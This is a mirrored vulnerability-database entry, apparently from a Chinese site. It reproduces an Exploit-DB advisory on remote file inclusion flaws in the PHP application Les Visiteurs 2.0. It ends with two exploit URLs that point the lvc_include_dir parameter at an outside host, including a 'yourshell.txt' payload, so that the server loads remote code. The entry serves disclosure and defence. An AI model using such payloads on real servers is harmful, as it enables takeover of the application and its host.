Les Visiteurs 2.0 - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055951 漏洞类型
发布时间 2006-09-28 更新时间 2006-09-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28727
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/20259/info

Les Visiteurs is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Les Visiteurs 2.0 and earlier versions are vulnerable; other versions may also be affected.

http://www.example.com/[Script Path]/include/config.inc.php?lvc_include_dir=http://www.example2.com?

http://www.example.com/include/new-visitor.inc.php?lvc_include_dir=http://yourshell.txt?